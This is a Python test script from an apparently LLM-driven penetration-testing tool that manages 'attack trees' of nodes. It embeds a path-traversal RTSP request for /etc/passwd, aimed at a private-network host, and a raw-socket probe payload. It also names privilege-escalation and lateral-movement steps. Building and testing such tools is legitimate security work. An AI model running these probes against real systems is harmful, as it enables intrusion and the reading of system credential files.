You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

167 lines
5.4 KiB

import re
2 months ago
import subprocess
import tempfile
import os
import pexpect
import struct
import sys
import mysql.connector
import requests
from mycode.LLMManager import LLMManager
from mycode.TaskObject import TaskObject
from myutils.PickleManager import g_PKM
from mycode.InstructionManager import g_instrM
from mycode.TaskManager import g_TaskM
from mycode.PythonTManager import PythonTManager
from myutils.ConfigManager import myCongif
from mycode.DBManager import app_DBM
import textwrap
class Mytest:
def update_node_inter(self,attack_index):
attack_tree = g_PKM.ReadData(attack_index)
nodes = attack_tree.traverse_dfs()
# 06-0=>p
instr = nodes[6].get_instr_user().pop(0)
nodes[6].parent.get_instr_user().append(instr)
# 39-1
instr = nodes[39].get_instr_user().pop(1)
nodes[39].parent.get_instr_user().append(instr)
# 49-0
instr = nodes[49].get_instr_user().pop(0)
nodes[49].parent.get_instr_user().append(instr)
g_PKM.WriteData(attack_tree, attack_index)
def dynamic_fun(self):
import socket
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(20) # 增加超时时间
s.connect(("192.168.3.105", 52989))
# 基于返回的 "99 -1 45973" 字符串构造特殊payload
special_cmd = b'99\\x01\\x00\\x00\\x00' # 模拟协议头
s.sendall(special_cmd)
response = s.recv(2048)
s.close()
return (True, f"SpecialCmd Response: {response.hex()}")
except Exception as e:
return (False, str(e))
def do_test(self):
pass
def tmp_test(self):
list_a = [0,1,2,3,4,5,6,7,8,9]
isart = len(list_a) - 4 # 正常应该都是两个两个
if isart % 2 != 0:
print("c_msg数量不对称,需要检查逻辑!")
for msg in list_a[isart:]:
print(msg)
if __name__ == "__main__":
# 示例使用
mytest = Mytest()
LLM = LLMManager(1)
current_path = os.path.dirname(os.path.realpath(__file__))
print(current_path)
test_type = 1
task_id = 49
task_Object = TaskObject("test_target","cookie_info",1,1,1,"local_ip","",None)
if test_type == 0:
mytest.dynamic_fun()
elif test_type == 1:
# # 获取所有自定义函数详情 HIGH_RISK_FUNCTIONS = ['eval', 'exec', 'os.system', 'subprocess.call', 'subprocess.Popen']
instruction = '''python-code
def dynamic_fun():
import socket
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(20) # 设置超时时间为20秒
s.connect(("192.168.3.105", 11200))
# 发送畸形RTSP请求探测边界条件
payload = "DESCRIBE rtsp://192.168.3.105/../../../../etc/passwd RTSP/1.0\\\\r\\\\n"
payload += "CSeq: 6\\\\r\\\\n\\\\r\\\\n"
s.send(payload.encode())
response = s.recv(4096).decode()
s.close()
if "404" in response:
return (False, "存在输入过滤机制")
elif "root:" in response:
return (True, "成功读取敏感文件")
else:
return (False, f"未知响应:{response}")
except Exception as e:
return (False, f"连接异常:{str(e)}")
'''
task_Object.PythonM.start_pool() #开个子进程池就行
start_time, end_time, bsuccess, instr, reslut, source_result, ext_params = task_Object.do_instruction(instruction)
# 暂存结果
oneres = {'执行指令': instr, '结果': reslut}
print("----执行结果----")
print(reslut)
elif test_type == 2: #给节点添加指令
node_path = "目标系统->192.168.3.105->52989端口"
instr_id = 3233
g_TaskM.load_tasks()
task = g_TaskM.tasks[task_id]
nodes = task.attack_tree.traverse_dfs()
cur_node = None
for node in nodes:
if node.path == node_path:
cur_node = node
break
if cur_node:
str_instr = app_DBM.get_one_instr(instr_id)
if "import" in str_instr:
str_instr = "python-code " + str_instr
cur_node.test_add_instr(str_instr)
cur_node.update_work_status(1)
#保存数据
g_PKM.WriteData(task.attack_tree,str(task.task_id))
else:
print("没找到节点!")
elif test_type ==3: #测试指令入节点
strinstr = '''
'''
strNodes = "执行系统命令探测,权限提升尝试,横向移动测试"
nodes = strNodes.split(', ')
unique_names = list(set(nodes)) # 去重
for node_name in unique_names:
print(node_name)
elif test_type == 4: # 修改Messages
attact_tree = g_PKM.ReadData("27")
# 创建一个新的节点
from mycode.AttackMap import TreeNode
testnode = TreeNode("test", 0)
LLM.build_initial_prompt(testnode) # 新的Message
systems = testnode.parent_messages[0]["content"]
# print(systems)
# 遍历node,查看有instr的ndoe
nodes = attact_tree.traverse_bfs()
for node in nodes:
node.parent_messages[0]["content"] = systems
g_PKM.WriteData(attact_tree, "27")
print("完成Messgae更新")
elif test_type ==5:
mytest.dynamic_fun()
elif test_type == 6:
mytest.tmp_test()
else:
pass